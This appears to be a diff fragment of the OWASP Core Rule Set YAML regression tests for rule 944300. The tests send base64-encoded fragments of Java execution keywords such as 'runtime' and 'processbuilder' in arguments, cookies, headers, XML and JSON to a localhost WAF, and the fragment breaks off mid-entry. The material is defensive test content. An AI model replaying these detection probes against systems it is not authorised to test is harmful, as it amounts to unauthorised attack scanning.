"POST" - version: "HTTP/1.0" - data: "test=HdoaWxlY2xvc3VyZQ" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-317 - desc: "Content-Type application/json arg value includes keyword HdoaWxlY2xvc3VyZQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"HdoaWxlY2xvc3VyZQ\"}" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-318 - desc: "Content-Type application/json arg name includes keyword HdoaWxlY2xvc3VyZQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"HdoaWxlY2xvc3VyZQ\": \"test\"}" - output: - log_contains: "id \"944300\"" - - - test_title: 944300-319 - desc: "Argument test includes keyword B3aGlsZWNsb3N1cmU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=B3aGlsZWNsb3N1cmU" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-320 - desc: "Argument name includes keyword B3aGlsZWNsb3N1cmU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "B3aGlsZWNsb3N1cmU=test" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-321 - desc: "Cookie test includes keyword B3aGlsZWNsb3N1cmU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=B3aGlsZWNsb3N1cmU - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-322 - desc: "Cookie name includes keyword B3aGlsZWNsb3N1cmU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: B3aGlsZWNsb3N1cmU=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-323 - desc: "Request header test includes keyword B3aGlsZWNsb3N1cmU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: B3aGlsZWNsb3N1cmU - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-324 - desc: "XML attribute value includes keyword B3aGlsZWNsb3N1cmU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-325 - desc: "XML element value includes keyword B3aGlsZWNsb3N1cmU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "B3aGlsZWNsb3N1cmU" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-326 - desc: "Nested XML element value includes keyword B3aGlsZWNsb3N1cmU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "B3aGlsZWNsb3N1cmU" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-327 - desc: "Content-Type text/plain includes keyword B3aGlsZWNsb3N1cmU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=B3aGlsZWNsb3N1cmU" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-328 - desc: "Content-Type application/json arg value includes keyword B3aGlsZWNsb3N1cmU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"B3aGlsZWNsb3N1cmU\"}" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-329 - desc: "Content-Type application/json arg name includes keyword B3aGlsZWNsb3N1cmU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"B3aGlsZWNsb3N1cmU\": \"test\"}" - output: - log_contains: "id \"944300\"" +meta: + author: "spartantri" + enabled: true + name: "944300.yaml" + description: "Positive tests for rule 944300" +tests: + - test_title: 944300-1 + desc: "Argument test includes keyword cnVudGltZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=cnVudGltZQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-2 + desc: "Argument name includes keyword cnVudGltZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "cnVudGltZQ=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-3 + desc: "Cookie test includes keyword cnVudGltZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=cnVudGltZQ + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-4 + desc: "Cookie name includes keyword cnVudGltZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: cnVudGltZQ=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-5 + desc: "Request header test includes keyword cnVudGltZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: cnVudGltZQ + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-6 + desc: "XML attribute value includes keyword cnVudGltZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-7 + desc: "XML element value includes keyword cnVudGltZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "cnVudGltZQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-8 + desc: "Nested XML element value includes keyword cnVudGltZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "cnVudGltZQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-9 + desc: "Content-Type text/plain includes keyword cnVudGltZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=cnVudGltZQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-10 + desc: "Content-Type application/json arg value includes keyword cnVudGltZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"cnVudGltZQ\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-11 + desc: "Content-Type application/json arg name includes keyword cnVudGltZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"cnVudGltZQ\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-12 + desc: "Argument test includes keyword HJ1bnRpbWU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=HJ1bnRpbWU" + output: + log_contains: "id \"944300\"" + - test_title: 944300-13 + desc: "Argument name includes keyword HJ1bnRpbWU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "HJ1bnRpbWU=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-14 + desc: "Cookie test includes keyword HJ1bnRpbWU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=HJ1bnRpbWU + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-15 + desc: "Cookie name includes keyword HJ1bnRpbWU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: HJ1bnRpbWU=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-16 + desc: "Request header test includes keyword HJ1bnRpbWU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: HJ1bnRpbWU + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-17 + desc: "XML attribute value includes keyword HJ1bnRpbWU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-18 + desc: "XML element value includes keyword HJ1bnRpbWU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "HJ1bnRpbWU" + output: + log_contains: "id \"944300\"" + - test_title: 944300-19 + desc: "Nested XML element value includes keyword HJ1bnRpbWU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "HJ1bnRpbWU" + output: + log_contains: "id \"944300\"" + - test_title: 944300-20 + desc: "Content-Type text/plain includes keyword HJ1bnRpbWU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=HJ1bnRpbWU" + output: + log_contains: "id \"944300\"" + - test_title: 944300-21 + desc: "Content-Type application/json arg value includes keyword HJ1bnRpbWU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"HJ1bnRpbWU\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-22 + desc: "Content-Type application/json arg name includes keyword HJ1bnRpbWU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"HJ1bnRpbWU\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-23 + desc: "Argument test includes keyword BydW50aW1l" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=BydW50aW1l" + output: + log_contains: "id \"944300\"" + - test_title: 944300-24 + desc: "Argument name includes keyword BydW50aW1l" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "BydW50aW1l=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-25 + desc: "Cookie test includes keyword BydW50aW1l" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=BydW50aW1l + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-26 + desc: "Cookie name includes keyword BydW50aW1l" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: BydW50aW1l=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-27 + desc: "Request header test includes keyword BydW50aW1l" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: BydW50aW1l + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-28 + desc: "XML attribute value includes keyword BydW50aW1l" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-29 + desc: "XML element value includes keyword BydW50aW1l" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "BydW50aW1l" + output: + log_contains: "id \"944300\"" + - test_title: 944300-30 + desc: "Nested XML element value includes keyword BydW50aW1l" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "BydW50aW1l" + output: + log_contains: "id \"944300\"" + - test_title: 944300-31 + desc: "Content-Type text/plain includes keyword BydW50aW1l" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=BydW50aW1l" + output: + log_contains: "id \"944300\"" + - test_title: 944300-32 + desc: "Content-Type application/json arg value includes keyword BydW50aW1l" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"BydW50aW1l\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-33 + desc: "Content-Type application/json arg name includes keyword BydW50aW1l" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"BydW50aW1l\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-34 + desc: "Argument test includes keyword cHJvY2Vzc2J1aWxkZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=cHJvY2Vzc2J1aWxkZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-35 + desc: "Argument name includes keyword cHJvY2Vzc2J1aWxkZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "cHJvY2Vzc2J1aWxkZXI=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-36 + desc: "Cookie test includes keyword cHJvY2Vzc2J1aWxkZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=cHJvY2Vzc2J1aWxkZXI + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-37 + desc: "Cookie name includes keyword cHJvY2Vzc2J1aWxkZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: cHJvY2Vzc2J1aWxkZXI=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - 